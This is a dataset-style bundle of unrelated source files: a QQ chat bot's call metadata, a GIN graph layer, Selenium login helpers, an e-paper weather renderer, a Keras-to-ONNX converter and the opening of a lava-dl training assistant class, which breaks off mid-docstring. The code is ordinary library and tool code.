| [((25, 9, 25, 21), 'nonebot.get_driver', 'get_driver', ({}, {}), '()', False, 'from nonebot import on_command, on_message, on_notice, on_regex, get_driver\n'), ((81, 14, 81, 67), 'nonebot.on_command', 'on_command', (), '', False, 'from nonebot import on_command, on_message, on_notice, on_regex, get_driver\n'), ((103, 12, 103, 76), 'nonebot.on_regex', 'on_regex', ({(103, 21, 103, 75): '"""^随个(?:dx|sd|标准)?[绿黄红紫白]?[0-9]+\\\\+?"""'}, {}), "('^随个(?:dx|sd|标准)?[绿黄红紫白]?[0-9]+\\\\+?')", False, 'from nonebot import on_command, on_message, on_notice, on_regex, get_driver\n'), ((129, 5, 129, 34), 'nonebot.on_regex', 'on_regex', ({(129, 14, 129, 33): '""".*maimai.*什么"""'}, {}), "('.*maimai.*什么')", False, 'from nonebot import on_command, on_message, on_notice, on_regex, get_driver\n'), ((137, 15, 137, 37), 'nonebot.on_regex', 'on_regex', ({(137, 24, 137, 36): '"""^查歌.+"""'}, {}), "('^查歌.+')", False, 'from nonebot import on_command, on_message, on_notice, on_regex, get_driver\n'), ((154, 14, 154, 58), 'nonebot.on_regex', 'on_regex', ({(154, 23, 154, 57): '"""^([绿黄红紫白]?)id([0-9]+)"""'}, {}), "('^([绿黄红紫白]?)id([0-9]+)')", False, 'from nonebot import on_command, on_message, on_notice, on_regex, get_driver\n'), ((243, 7, 243, 56), 'nonebot.on_command', 'on_command', (), '', False, 'from nonebot import on_command, on_message, on_notice, on_regex, get_driver\n'), ((269, 16, 269, 33), 'collections.defaultdict', 'defaultdict', ({(269, 28, 269, 32): 'list'}, {}), '(list)', False, 'from collections import defaultdict\n'), ((280, 12, 280, 39), 'nonebot.on_regex', 'on_regex', ({(280, 21, 280, 38): '""".+是什么歌"""'}, {}), "('.+是什么歌')", False, 'from nonebot import on_command, on_message, on_notice, on_regex, get_driver\n'), ((299, 14, 299, 37), 'nonebot.on_command', 'on_command', ({(299, 25, 299, 36): '"""分数线"""'}, {}), "('分数线')", False, 'from nonebot import on_command, on_message, on_notice, on_regex, get_driver\n'), ((353, 14, 353, 31), 'nonebot.on_command', 'on_command', ({(353, 25, 353, 30): '"""b40"""'}, {}), "('b40')", False, 'from nonebot import on_command, on_message, on_notice, on_regex, get_driver\n'), ((377, 22, 377, 60), 'nonebot.on_command', 'on_command', (), '', False, 'from nonebot import on_command, on_message, on_notice, on_regex, get_driver\n'), ((407, 14, 407, 46), 'nonebot.on_command', 'on_command', (), '', False, 'from nonebot import on_command, on_message, on_notice, on_regex, get_driver\n'), ((479, 20, 479, 43), 'nonebot.on_message', 'on_message', (), '', False, 'from nonebot import on_command, on_message, on_notice, on_regex, get_driver\n'), ((30, 4, 30, 46), 'nonebot.log.logger.info', 'logger.info', ({(30, 16, 30, 45): '"""Load help text successfully"""'}, {}), "('Load help text successfully')", False, 'from nonebot.log import logger\n'), ((249, 9, 249, 17), 'src.libraries.tool.hash', 'hash', ({(249, 14, 249, 16): 'qq'}, {}), '(qq)', False, 'from src.libraries.tool import hash\n'), ((469, 12, 469, 25), 'src.libraries.maimaidx_guess.GuessObject', 'GuessObject', ({}, {}), '()', False, 'from src.libraries.maimaidx_guess import GuessObject\n'), ((364, 25, 364, 42), 'src.libraries.maimai_best_40.generate', 'generate', ({(364, 34, 364, 41): 'payload'}, {}), '(payload)', False, 'from src.libraries.maimai_best_40 import generate\n'), ((474, 23, 474, 34), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((31, 22, 31, 34), 'nonebot.get_driver', 'get_driver', ({}, {}), '()', False, 'from nonebot import on_command, on_message, on_notice, on_regex, get_driver\n'), ((147, 30, 151, 33), 
'nonebot.adapters.cqhttp.Message', 'Message', ({(147, 38, 151, 32): '[{\'type\': \'text\', \'data\': {\'text\': f"{music[\'id\']}. {music[\'title\']}\\n"}} for\n music in res]'}, {}), '([{\'type\': \'text\', \'data\': {\'text\':\n f"{music[\'id\']}. {music[\'title\']}\\n"}} for music in res])', False, 'from nonebot.adapters.cqhttp import Message, MessageSegment, GroupMessageEvent, PrivateMessageEvent\n'), ((389, 9, 389, 21), 'nonebot.get_driver', 'get_driver', ({}, {}), '()', False, 'from nonebot import on_command, on_message, on_notice, on_regex, get_driver\n'), ((393, 9, 393, 21), 'nonebot.get_driver', 'get_driver', ({}, {}), '()', False, 'from nonebot import on_command, on_message, on_notice, on_regex, get_driver\n'), ((461, 17, 461, 29), 'nonebot.get_driver', 'get_driver', ({}, {}), '()', False, 'from nonebot import on_command, on_message, on_notice, on_regex, get_driver\n'), ((445, 13, 445, 25), 'nonebot.get_driver', 'get_driver', ({}, {}), '()', False, 'from nonebot import on_command, on_message, on_notice, on_regex, get_driver\n'), ((466, 34, 466, 45), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((189, 35, 208, 14), 'nonebot.adapters.cqhttp.Message', 'Message', ({(189, 43, 208, 13): '[{\'type\': \'text\', \'data\': {\'text\': f"{music[\'id\']}. {music[\'title\']}\\n"}},\n {\'type\': \'image\', \'data\': {\'file\': f\'{file}\'}}, {\'type\': \'text\', \'data\':\n {\'text\': msg}}]'}, {}), '([{\'type\': \'text\', \'data\': {\'text\':\n f"{music[\'id\']}. {music[\'title\']}\\n"}}, {\'type\': \'image\', \'data\': {\n \'file\': f\'{file}\'}}, {\'type\': \'text\', \'data\': {\'text\': msg}}])', False, 'from nonebot.adapters.cqhttp import Message, MessageSegment, GroupMessageEvent, PrivateMessageEvent\n'), ((435, 49, 435, 135), 'nonebot.adapters.cqhttp.MessageSegment.text', 'MessageSegment.text', ({(435, 69, 435, 134): '(\'答案是:\' + f"{guess.music[\'id\']}. {guess.music[\'title\']}\\n")'}, {}), '(\'答案是:\' + f"{guess.music[\'id\']}. 
{guess.music[\'title\']}\\n")', False, 'from nonebot.adapters.cqhttp import Message, MessageSegment, GroupMessageEvent, PrivateMessageEvent\n'), ((435, 137, 435, 220), 'nonebot.adapters.cqhttp.MessageSegment.image', 'MessageSegment.image', ({(435, 158, 435, 219): 'f"""https://www.diving-fish.com/covers/{guess.music[\'id\']}.jpg"""'}, {}), '(\n f"https://www.diving-fish.com/covers/{guess.music[\'id\']}.jpg")', False, 'from nonebot.adapters.cqhttp import Message, MessageSegment, GroupMessageEvent, PrivateMessageEvent\n'), ((455, 38, 455, 49), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((327, 18, 327, 38), 're.match', 're.match', ({(327, 27, 327, 28): 'r', (327, 30, 327, 37): 'argv[0]'}, {}), '(r, argv[0])', False, 'import re\n'), ((420, 12, 420, 72), 'nonebot.adapters.cqhttp.MessageSegment.text', 'MessageSegment.text', ({(420, 32, 420, 71): '"""7/7 这首歌封面的一部分是:"""'}, {}), "('7/7 这首歌封面的一部分是:')", False, 'from nonebot.adapters.cqhttp import Message, MessageSegment, GroupMessageEvent, PrivateMessageEvent\n'), ((422, 12, 422, 63), 'nonebot.adapters.cqhttp.MessageSegment.text', 'MessageSegment.text', ({(422, 32, 422, 62): '"""答案将在 30 秒后揭晓"""'}, {}), "('答案将在 30 秒后揭晓')", False, 'from nonebot.adapters.cqhttp import Message, MessageSegment, GroupMessageEvent, PrivateMessageEvent\n'), ((495, 12, 495, 50), 'nonebot.adapters.cqhttp.MessageSegment.reply', 'MessageSegment.reply', ({(495, 33, 495, 49): 'event.message_id'}, {}), '(event.message_id)', False, 'from nonebot.adapters.cqhttp import Message, MessageSegment, GroupMessageEvent, PrivateMessageEvent\n'), ((496, 12, 496, 110), 'nonebot.adapters.cqhttp.MessageSegment.text', 'MessageSegment.text', ({(496, 32, 496, 109): '(\'猜对了,答案是:\' + f"{guess.music[\'id\']}. {guess.music[\'title\']}\\n")'}, {}), '(\'猜对了,答案是:\' +\n f"{guess.music[\'id\']}. {guess.music[\'title\']}\\n")', False, 'from nonebot.adapters.cqhttp import Message, MessageSegment, GroupMessageEvent, PrivateMessageEvent\n'), ((497, 12, 497, 95), 'nonebot.adapters.cqhttp.MessageSegment.image', 'MessageSegment.image', ({(497, 33, 497, 94): 'f"""https://www.diving-fish.com/covers/{guess.music[\'id\']}.jpg"""'}, {}), '(\n f"https://www.diving-fish.com/covers/{guess.music[\'id\']}.jpg")', False, 'from nonebot.adapters.cqhttp import Message, MessageSegment, GroupMessageEvent, PrivateMessageEvent\n'), ((371, 12, 371, 50), 'nonebot.adapters.cqhttp.MessageSegment.reply', 'MessageSegment.reply', ({(371, 33, 371, 49): 'event.message_id'}, {}), '(event.message_id)', False, 'from nonebot.adapters.cqhttp import Message, MessageSegment, GroupMessageEvent, PrivateMessageEvent\n'), ((467, 100, 467, 132), 'time.localtime', 'time.localtime', ({(467, 115, 467, 131): 'guess_cd_dict[k]'}, {}), '(guess_cd_dict[k])', False, 'import time\n')] |
hsgwa/trace_analysis | trace_analysis/trace_analysis/architecture/interface.py | 16169f84e838af5202e2be8f4883dfca5bc7f592 | # Copyright 2021 Research Institute of Systems Planning, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import List, Optional
from abc import ABCMeta, abstractmethod
from trace_analysis.callback import CallbackBase
from trace_analysis.communication import VariablePassing, Communication
from trace_analysis.node import Node
UNDEFINED_STR = "UNDEFINED"
class PathAlias:
def __init__(self, alias: str, callback_names: List[str]):
self.path_name = alias
self.callback_names = callback_names
class ArchitectureInterface(metaclass=ABCMeta):
@property
@abstractmethod
def nodes(self) -> List[Node]:
pass
@property
@abstractmethod
def path_aliases(self) -> List[PathAlias]:
pass
@property
@abstractmethod
def communications(self) -> List[Communication]:
pass
@property
@abstractmethod
def variable_passings(self) -> List[VariablePassing]:
pass
class ArchitectureImporter(ArchitectureInterface):
@abstractmethod
def __init__(self) -> None:
pass
@abstractmethod
def exec(self, path: str, ignore_topics: Optional[List[str]] = None) -> None:
pass
class ArchitectureExporter(metaclass=ABCMeta):
@abstractmethod
def exec(self, architecture: ArchitectureInterface, path) -> None:
pass
| [] |
treehousekingcomic/disrank | disrank/__init__.py | 6a6ef3a2f2d4dc81bc3da8064b897dac4c773ef7 | from thkc_disrank import *
| [] |
JakeStevens/benchmarking-gnns | layers/gin_layer.py | a17fdf1b1d758fc65d5eeaf3726f5efa747a4081 | import torch
import torch.nn as nn
import torch.nn.functional as F
import dgl.function as fn
"""
GIN: Graph Isomorphism Networks
HOW POWERFUL ARE GRAPH NEURAL NETWORKS? (Keyulu Xu, Weihua Hu, Jure Leskovec and Stefanie Jegelka, ICLR 2019)
https://arxiv.org/pdf/1810.00826.pdf
"""
class GINLayer(nn.Module):
"""
[!] code adapted from dgl implementation of GINConv
Parameters
----------
apply_func : callable activation function/layer or None
If not None, apply this function to the updated node feature,
the :math:`f_\Theta` in the formula.
aggr_type :
Aggregator type to use (``sum``, ``max`` or ``mean``).
out_dim :
        Required for batch norm layer; should match out_dim of apply_func if not None.
dropout :
Required for dropout of output features.
graph_norm :
boolean flag for output features normalization w.r.t. graph sizes.
batch_norm :
boolean flag for batch_norm layer.
residual :
boolean flag for using residual connection.
init_eps : optional
Initial :math:`\epsilon` value, default: ``0``.
learn_eps : bool, optional
If True, :math:`\epsilon` will be a learnable parameter.
"""
def __init__(self, apply_func, aggr_type, dropout, graph_norm, batch_norm, residual=False, init_eps=0, learn_eps=False):
super().__init__()
self.apply_func = apply_func
if aggr_type == 'sum':
self._reducer = fn.sum
elif aggr_type == 'max':
self._reducer = fn.max
elif aggr_type == 'mean':
self._reducer = fn.mean
else:
raise KeyError('Aggregator type {} not recognized.'.format(aggr_type))
self.graph_norm = graph_norm
self.batch_norm = batch_norm
self.residual = residual
self.dropout = dropout
in_dim = apply_func.mlp.input_dim
out_dim = apply_func.mlp.output_dim
if in_dim != out_dim:
self.residual = False
# to specify whether eps is trainable or not.
if learn_eps:
self.eps = torch.nn.Parameter(torch.FloatTensor([init_eps]))
else:
self.register_buffer('eps', torch.FloatTensor([init_eps]))
self.bn_node_h = nn.BatchNorm1d(out_dim)
def forward(self, g, h, snorm_n):
h_in = h # for residual connection
g = g.local_var()
g.ndata['h'] = h
g.update_all(fn.copy_u('h', 'm'), self._reducer('m', 'neigh'))
h = (1 + self.eps) * h + g.ndata['neigh']
if self.apply_func is not None:
h = self.apply_func(h)
if self.graph_norm:
            h = h * snorm_n  # normalize activation w.r.t. graph size
if self.batch_norm:
h = self.bn_node_h(h) # batch normalization
h = F.relu(h) # non-linear activation
if self.residual:
h = h_in + h # residual connection
h = F.dropout(h, self.dropout, training=self.training)
return h
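# A minimal construction sketch (dimensions and flags are arbitrary choices
# for illustration; MLP and ApplyNodeFunc are defined below):
#
#     mlp = MLP(num_layers=2, input_dim=16, hidden_dim=32, output_dim=16)
#     gin = GINLayer(ApplyNodeFunc(mlp), aggr_type='sum', dropout=0.0,
#                    graph_norm=False, batch_norm=True, residual=True)
#     # forward pass: h_out = gin(g, h, snorm_n) with a DGLGraph g, node
#     # features h of shape (N, 16), and per-node graph-size norms snorm_n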
class ApplyNodeFunc(nn.Module):
"""
This class is used in class GINNet
Update the node feature hv with MLP
"""
def __init__(self, mlp):
super().__init__()
self.mlp = mlp
def forward(self, h):
h = self.mlp(h)
return h
class MLP(nn.Module):
"""MLP with linear output"""
def __init__(self, num_layers, input_dim, hidden_dim, output_dim):
super().__init__()
self.linear_or_not = True # default is linear model
self.num_layers = num_layers
self.output_dim = output_dim
self.input_dim = input_dim
if num_layers < 1:
raise ValueError("number of layers should be positive!")
elif num_layers == 1:
# Linear model
self.linear = nn.Linear(input_dim, output_dim)
else:
# Multi-layer model
self.linear_or_not = False
self.linears = torch.nn.ModuleList()
self.batch_norms = torch.nn.ModuleList()
self.linears.append(nn.Linear(input_dim, hidden_dim))
for layer in range(num_layers - 2):
self.linears.append(nn.Linear(hidden_dim, hidden_dim))
self.linears.append(nn.Linear(hidden_dim, output_dim))
for layer in range(num_layers - 1):
                self.batch_norms.append(nn.BatchNorm1d(hidden_dim))
def forward(self, x):
if self.linear_or_not:
# If linear model
return self.linear(x)
else:
# If MLP
h = x
for i in range(self.num_layers - 1):
h = F.relu(self.batch_norms[i](self.linears[i](h)))
return self.linears[-1](h) | [((69, 25, 69, 48), 'torch.nn.BatchNorm1d', 'nn.BatchNorm1d', ({(69, 40, 69, 47): 'out_dim'}, {}), '(out_dim)', True, 'import torch.nn as nn\n'), ((87, 12, 87, 21), 'torch.nn.functional.relu', 'F.relu', ({(87, 19, 87, 20): 'h'}, {}), '(h)', True, 'import torch.nn.functional as F\n'), ((92, 12, 92, 62), 'torch.nn.functional.dropout', 'F.dropout', (), '', True, 'import torch.nn.functional as F\n'), ((76, 21, 76, 40), 'dgl.function.copy_u', 'fn.copy_u', ({(76, 31, 76, 34): '"""h"""', (76, 36, 76, 39): '"""m"""'}, {}), "('h', 'm')", True, 'import dgl.function as fn\n'), ((65, 42, 65, 71), 'torch.FloatTensor', 'torch.FloatTensor', ({(65, 60, 65, 70): '[init_eps]'}, {}), '([init_eps])', False, 'import torch\n'), ((67, 40, 67, 69), 'torch.FloatTensor', 'torch.FloatTensor', ({(67, 58, 67, 68): '[init_eps]'}, {}), '([init_eps])', False, 'import torch\n'), ((125, 26, 125, 58), 'torch.nn.Linear', 'nn.Linear', ({(125, 36, 125, 45): 'input_dim', (125, 47, 125, 57): 'output_dim'}, {}), '(input_dim, output_dim)', True, 'import torch.nn as nn\n'), ((129, 27, 129, 48), 'torch.nn.ModuleList', 'torch.nn.ModuleList', ({}, {}), '()', False, 'import torch\n'), ((130, 31, 130, 52), 'torch.nn.ModuleList', 'torch.nn.ModuleList', ({}, {}), '()', False, 'import torch\n'), ((132, 32, 132, 64), 'torch.nn.Linear', 'nn.Linear', ({(132, 42, 132, 51): 'input_dim', (132, 53, 132, 63): 'hidden_dim'}, {}), '(input_dim, hidden_dim)', True, 'import torch.nn as nn\n'), ((135, 32, 135, 65), 'torch.nn.Linear', 'nn.Linear', ({(135, 42, 135, 52): 'hidden_dim', (135, 54, 135, 64): 'output_dim'}, {}), '(hidden_dim, output_dim)', True, 'import torch.nn as nn\n'), ((134, 36, 134, 69), 'torch.nn.Linear', 'nn.Linear', ({(134, 46, 134, 56): 'hidden_dim', (134, 58, 134, 68): 'hidden_dim'}, {}), '(hidden_dim, hidden_dim)', True, 'import torch.nn as nn\n'), ((138, 40, 138, 68), 'torch.nn.BatchNorm1d', 'nn.BatchNorm1d', ({(138, 56, 138, 66): 'hidden_dim'}, {}), '(hidden_dim)', True, 'import torch.nn as nn\n')] |
jedhsu/music | music/distance/aural/diatonic/__init__.py | dea68c4a82296cd4910e786f533b2cbf861377c3 | """
*mus . it . dia*
The simple diatonic intervals.
"""
from .second import MinorSecond
from .second import MajorSecond
from .third import MinorThird
from .third import MajorThird
from .fourth import PerfectFourth
from .fifth import Tritone
from .fifth import PerfectFifth
from .sixth import MinorSixth
from .sixth import MajorSixth
from .seventh import MinorSeventh
from .seventh import MajorSeventh
from .eighth import Octave
__all__ = [
"MinorSecond",
"MajorSecond",
"MinorThird",
"MajorThird",
"PerfectFourth",
"Tritone",
"PerfectFifth",
"MinorSixth",
"MajorSixth",
"MinorSeventh",
"MajorSeventh",
"Octave",
]
| [] |
AriTheGuitarMan/AriTheGuitarMan.github.io | selenium_tests/test_functions.py | 8348ad0c47e48477560e7e40ec7eac8bca6fcdfa | # this file holds some common testing functions
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
depurl = "localhost:3000"
def getElement(driver, xpath):
return WebDriverWait(driver, 10).until(EC.presence_of_element_located((By.XPATH, xpath)))
def login(driver, username, password):
driver.get(depurl)
elem = getElement(driver, "//input[@id='username']")
elem.clear()
elem.send_keys(username)
elem = getElement(driver, "//input[@id='password']")
elem.clear()
elem.send_keys(password)
elem.send_keys(Keys.RETURN)
def logout(driver):
elem = getElement(driver, "//a[text()='Logout']")
elem.click() | [((9, 43, 9, 92), 'selenium.webdriver.support.expected_conditions.presence_of_element_located', 'EC.presence_of_element_located', ({(9, 74, 9, 91): '(By.XPATH, xpath)'}, {}), '((By.XPATH, xpath))', True, 'from selenium.webdriver.support import expected_conditions as EC\n'), ((9, 11, 9, 36), 'selenium.webdriver.support.wait.WebDriverWait', 'WebDriverWait', ({(9, 25, 9, 31): 'driver', (9, 33, 9, 35): '(10)'}, {}), '(driver, 10)', False, 'from selenium.webdriver.support.wait import WebDriverWait\n')] |
ryuchihoon/WeatherStation | papirus_renderer.py | e3fd210939a961bc1724197f3885964cb4ae5a28 | # -*- coding: utf-8 -*-
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
import os
import time
import collections
from PIL import Image, ImageOps, ImageDraw, ImageFont
code_2_icono = collections.defaultdict(lambda: ['38'])  # one-element list so [0]/[1] indexing works for unknown codes
kor_2_eng = collections.defaultdict(lambda: ['UNKNOWN'])
code_2_icono['SKY_O00'] = ['38']
code_2_icono['SKY_O01'] = ['01', '08']
code_2_icono['SKY_O02'] = ['02', '09']
code_2_icono['SKY_O03'] = ['03', '10']
code_2_icono['SKY_O04'] = ['12', '40']
code_2_icono['SKY_O05'] = ['13', '41']
code_2_icono['SKY_O06'] = ['14', '42']
code_2_icono['SKY_O07'] = ['18']
code_2_icono['SKY_O08'] = ['21']
code_2_icono['SKY_O09'] = ['32']
code_2_icono['SKY_O10'] = ['04']
code_2_icono['SKY_O11'] = ['29']
code_2_icono['SKY_O12'] = ['26']
code_2_icono['SKY_O13'] = ['27']
code_2_icono['SKY_O14'] = ['28']
code_2_icono['SKY_W00'] = ['38']
code_2_icono['SKY_W01'] = ['01', '08']
code_2_icono['SKY_W02'] = ['02', '09']
code_2_icono['SKY_W03'] = ['03', '10']
code_2_icono['SKY_W04'] = ['18']
code_2_icono['SKY_W07'] = ['21']
code_2_icono['SKY_W09'] = ['12', '40']
code_2_icono['SKY_W10'] = ['21']
code_2_icono['SKY_W11'] = ['04']
code_2_icono['SKY_W12'] = ['13', '41']
code_2_icono['SKY_W13'] = ['32']
kor_2_eng[u'좋음'] = ['GOOD']
kor_2_eng[u'보통'] = ['NORMAL']
kor_2_eng[u'나쁨'] = ['BAD']
kor_2_eng[u'매우 나쁨'] = ['V BAD']
def geticonfname(code, drawNight=False):
l = code_2_icono[code]
dname = os.path.join(os.path.dirname(__file__), "resources", "weather_icons_mod")
if len(l) > 1 and drawNight:
cur_hour = time.localtime().tm_hour
is_night = cur_hour < 5 or cur_hour > 18
if is_night:
return os.path.join(dname, l[1] + '.png')
else:
return os.path.join(dname, l[0] + '.png')
else:
return os.path.join(dname, l[0] + '.png')
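# For example: geticonfname('SKY_O01', drawNight=True) resolves to the night
# icon '08.png' between 19:00 and 04:59 local time and to '01.png' otherwise;
# codes with a single icon entry ignore the drawNight flag.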
BLACK = 0
WHITE = 1
class PapirusRenderer:
"""Renderer for Papirus HAT"""
def __init__(self, rotate=0, font_path=None):
if font_path:
self.font_path = font_path
else:
self.font_path = "/usr/share/fonts/truetype/freefont/FreeMono.ttf"
print("rotate:",rotate)
try:
from papirus import Papirus
self.papirus = Papirus(rotate=rotate)
self.canvas_size = self.papirus.size
print("papirus size : %s"%str(self.canvas_size))
except ImportError:
print("papirus import failed")
self.papirus = None
self.canvas_size = (264,176)
def render(self, weather, weather_forecast):
canvas = Image.new('1', self.canvas_size, WHITE)
print("font_path:",self.font_path)
fname = geticonfname(weather.weather_code, drawNight=True)
print("file:",fname)
self._drawImage(canvas, fname, 20,10,(100,100))
print("cur desc : %s"%str(weather.weather_desc))
print("cur airq : %s"%str(weather.air_quality))
temperature = str(weather.cur_temperature).split('.')[0] + u" \u2103"
self._drawText(canvas, temperature, 70,115, font_size=20, center_horizontal=True)
translated = kor_2_eng[weather.air_quality][0]
print("cur airq translated: %s"%translated)
self._drawText(canvas, translated, 70,140, font_size=20, center_horizontal=True)
base_x,base_y = 145,5
for i,w in enumerate(weather_forecast):
fname = geticonfname(w.weather_code)
self._drawImage(canvas, fname, base_x, base_y+55*i, (50,50))
temperature = str(w.min_temperature) + " / " + str(w.max_temperature)
self._drawText(canvas, temperature, base_x+80, base_y+28+55*i, font_size=14, center_horizontal=True)
# update time
self._drawText(canvas, time.strftime("%Y-%m-%d %H:%M",time.localtime()), 136, 165, font_size=9, center_horizontal=True)
if self.papirus == None:
# save a image for debugging purpose
with open("result.jpg", "wb") as fp:
canvas.save(fp)
print("result file saved")
else:
self.papirus.display(canvas)
self.papirus.update()
def _drawImage(self, canvas, image_path, x, y, size):
image = Image.open(image_path)
image = ImageOps.grayscale(image)
image = image.resize(size)
image = image.convert("1", dither=Image.FLOYDSTEINBERG)
canvas.paste(image,(x,y))
def _drawText(self, canvas, text, x, y, font_size=20, center_horizontal=False):
draw = ImageDraw.Draw(canvas)
font = ImageFont.truetype(self.font_path, font_size)
text_draw_size = draw.textsize(text, font=font)
if center_horizontal:
x = x - text_draw_size[0]/2
draw.text( (x, y) , text, font=font, fill=BLACK)
| [((5, 0, 5, 31), 'sys.setdefaultencoding', 'sys.setdefaultencoding', ({(5, 23, 5, 30): '"""utf-8"""'}, {}), "('utf-8')", False, 'import sys\n'), ((14, 15, 14, 53), 'collections.defaultdict', 'collections.defaultdict', ({(14, 39, 14, 52): "lambda : '38'"}, {}), "(lambda : '38')", False, 'import collections\n'), ((15, 12, 15, 55), 'collections.defaultdict', 'collections.defaultdict', ({(15, 36, 15, 54): "lambda : 'UNKNOWN'"}, {}), "(lambda : 'UNKNOWN')", False, 'import collections\n'), ((54, 25, 54, 50), 'os.path.dirname', 'os.path.dirname', ({(54, 41, 54, 49): '__file__'}, {}), '(__file__)', False, 'import os\n'), ((63, 15, 63, 49), 'os.path.join', 'os.path.join', ({(63, 28, 63, 33): 'dname', (63, 35, 63, 48): "(l[0] + '.png')"}, {}), "(dname, l[0] + '.png')", False, 'import os\n'), ((95, 17, 95, 56), 'PIL.Image.new', 'Image.new', ({(95, 27, 95, 30): '"""1"""', (95, 32, 95, 48): 'self.canvas_size', (95, 50, 95, 55): 'WHITE'}, {}), "('1', self.canvas_size, WHITE)", False, 'from PIL import Image, ImageOps, ImageDraw, ImageFont\n'), ((131, 16, 131, 38), 'PIL.Image.open', 'Image.open', ({(131, 27, 131, 37): 'image_path'}, {}), '(image_path)', False, 'from PIL import Image, ImageOps, ImageDraw, ImageFont\n'), ((132, 16, 132, 41), 'PIL.ImageOps.grayscale', 'ImageOps.grayscale', ({(132, 35, 132, 40): 'image'}, {}), '(image)', False, 'from PIL import Image, ImageOps, ImageDraw, ImageFont\n'), ((139, 15, 139, 37), 'PIL.ImageDraw.Draw', 'ImageDraw.Draw', ({(139, 30, 139, 36): 'canvas'}, {}), '(canvas)', False, 'from PIL import Image, ImageOps, ImageDraw, ImageFont\n'), ((140, 15, 140, 60), 'PIL.ImageFont.truetype', 'ImageFont.truetype', ({(140, 34, 140, 48): 'self.font_path', (140, 50, 140, 59): 'font_size'}, {}), '(self.font_path, font_size)', False, 'from PIL import Image, ImageOps, ImageDraw, ImageFont\n'), ((56, 19, 56, 35), 'time.localtime', 'time.localtime', ({}, {}), '()', False, 'import time\n'), ((59, 19, 59, 53), 'os.path.join', 'os.path.join', ({(59, 32, 59, 37): 'dname', (59, 39, 59, 52): "(l[1] + '.png')"}, {}), "(dname, l[1] + '.png')", False, 'import os\n'), ((61, 19, 61, 53), 'os.path.join', 'os.path.join', ({(61, 32, 61, 37): 'dname', (61, 39, 61, 52): "(l[0] + '.png')"}, {}), "(dname, l[0] + '.png')", False, 'import os\n'), ((84, 27, 84, 49), 'papirus.Papirus', 'Papirus', (), '', False, 'from papirus import Papirus\n'), ((118, 62, 118, 78), 'time.localtime', 'time.localtime', ({}, {}), '()', False, 'import time\n')] |
VForWaTer/hydrobox | hydrobox/discharge/__init__.py | ae7d10bf5aa48bf7daf3d1094e6bb66f0a7ce96b | from .catchment import regime, flow_duration_curve
from . import indices | [] |
ecmwf-lab/infero | scripts/convert_keras2onnx.py | 4fec006175af48cd0313b2f89722c01636e961db | #
# (C) Copyright 1996- ECMWF.
#
# This software is licensed under the terms of the Apache Licence Version 2.0
# which can be obtained at http://www.apache.org/licenses/LICENSE-2.0.
# In applying this licence, ECMWF does not waive the privileges and immunities
# granted to it by virtue of its status as an intergovernmental organisation
# nor does it submit to any jurisdiction.
#
import os
import numpy as np
import argparse
import keras
import keras2onnx
if __name__ == "__main__":
"""
    Lightweight script to convert a Keras model into an ONNX model
"""
    parser = argparse.ArgumentParser("Keras to ONNX converter")
    parser.add_argument('keras_model_path', help="Path of the input keras model")
    parser.add_argument('onnx_model_path', help="Path of the output onnx model")
    # NB: accepted on the command line but not acted on in this script.
    parser.add_argument("--verify_with", help="Check the model by passing an input numpy path")
    args = parser.parse_args()
# load the keras model
model = keras.models.load_model(args.keras_model_path)
model.summary()
# do the conversion
onnx_model = keras2onnx.convert_keras(model, model.name)
# write to file
    with open(args.onnx_model_path, "wb") as onnx_file:
        onnx_file.write(onnx_model.SerializeToString())
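    # Example invocation (hypothetical paths):
    #   python convert_keras2onnx.py model.h5 model.onnx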
| [((23, 13, 23, 57), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ({(23, 37, 23, 56): '"""Data Augmentation"""'}, {}), "('Data Augmentation')", False, 'import argparse\n'), ((31, 12, 31, 58), 'keras.models.load_model', 'keras.models.load_model', ({(31, 36, 31, 57): 'args.keras_model_path'}, {}), '(args.keras_model_path)', False, 'import keras\n'), ((35, 17, 35, 60), 'keras2onnx.convert_keras', 'keras2onnx.convert_keras', ({(35, 42, 35, 47): 'model', (35, 49, 35, 59): 'model.name'}, {}), '(model, model.name)', False, 'import keras2onnx\n')] |
timcheck/lava-dl | src/lava/lib/dl/slayer/utils/assistant.py | e680722071129fde952ea0d744984aa2a038797a | # Copyright (C) 2022 Intel Corporation
# SPDX-License-Identifier: BSD-3-Clause
"""Assistant utility for automatically load network from network
description."""
import torch
class Assistant:
"""Assistant that bundles training, validation and testing workflow.
Parameters
----------
net : torch.nn.Module
network to train.
error : object or lambda
an error object or a lambda function that evaluates error.
It is expected to take ``(output, target)`` | ``(output, label)``
        as its argument and return a scalar value.
optimizer : torch optimizer
the learning optimizer.
stats : slayer.utils.stats
learning stats logger. If None, stats will not be logged.
Defaults to None.
classifier : slayer.classifier or lambda
classifier object or lambda function that takes output and
returns the network prediction. None means regression mode.
Classification steps are bypassed.
Defaults to None.
count_log : bool
flag to enable count log. Defaults to False.
lam : float
        Lagrange multiplier used to merge layer-wise network loss.
        None means no such additional loss.
        If not None, net is expected to return the accumulated loss as second
        argument. It is intended to be used with layer-wise sparsity loss.
Defaults to None.
Attributes
----------
net
error
optimizer
stats
classifier
count_log
lam
device : torch.device or None
        the main device memory where the network is placed. It is None at
        start and gets initialized on the first call.
"""
def __init__(
self,
net, error, optimizer,
stats=None, classifier=None, count_log=False,
lam=None
):
self.net = net
self.error = error
self.optimizer = optimizer
self.classifier = classifier
self.stats = stats
self.count_log = count_log
self.lam = lam
self.device = None
def reduce_lr(self, factor=10 / 3):
"""Reduces the learning rate of the optimizer by ``factor``.
Parameters
----------
factor : float
learning rate reduction factor. Defaults to 10/3.
Returns
-------
"""
for param_group in self.optimizer.param_groups:
print('\nLearning rate reduction from', param_group['lr'])
param_group['lr'] /= factor
def train(self, input, target):
"""Training assistant.
Parameters
----------
input : torch tensor
input tensor.
target : torch tensor
ground truth or label.
Returns
-------
output
network's output.
count : optional
